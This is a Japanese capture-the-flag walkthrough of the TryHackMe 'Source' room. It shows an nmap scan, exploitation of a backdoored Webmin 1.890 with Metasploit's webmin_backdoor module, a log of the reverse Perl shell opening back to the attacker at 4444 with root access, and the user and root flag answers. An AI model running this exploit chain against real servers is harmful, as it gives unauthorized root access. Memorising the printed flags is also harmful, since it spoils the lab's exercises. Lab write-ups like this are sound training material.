概要
TryHackMe「Source」のWalkthroughです。
Task1
Q1.user.txt
ポートスキャンを実行します。
$ nmap -Pn -T4 -A -sC -sV -p- 10.10.28.202 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
ポートの稼働状況が分かりました。
ポート | サービス | バージョン |
---|---|---|
22 | ssh | OpenSSH 7.6p1 |
10000 | http | MiniServ 1.890 |
https://<ip>:10000
にアクセスするとログイン画面が表示されました。
MiniServ 1.890
で脆弱性情報を検索するとバックドアの脆弱性が見つかりました。
Metasploit
のlinux/http/webmin_backdoor
モジュールを使用します。
オプションを設定します。
実行するとroot
アカウントのシェルを取得できました。
msf6 exploit(linux/http/webmin_backdoor) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.6.55.144:4444 -> 10.10.106.151:44934) at 2024-09-24 13:03:30 -0400
whoami
root
user.txt
を検索します。
find / -name user.txt 2>/dev/null
/home/dark/user.txt
/home/dark/user.txt
からユーザーフラグを入手できました。
/home/dark/user.txt
THM{SUPPLY_CHAIN_COMPROMISE}
A.THM{SUPPLY_CHAIN_COMPROMISE}
Q2.root.txt
/root/root.txt
からルートフラグを入手できます。
/root/root.txt
THM{UPDATE_YOUR_INSTALL}
A.THM{UPDATE_YOUR_INSTALL}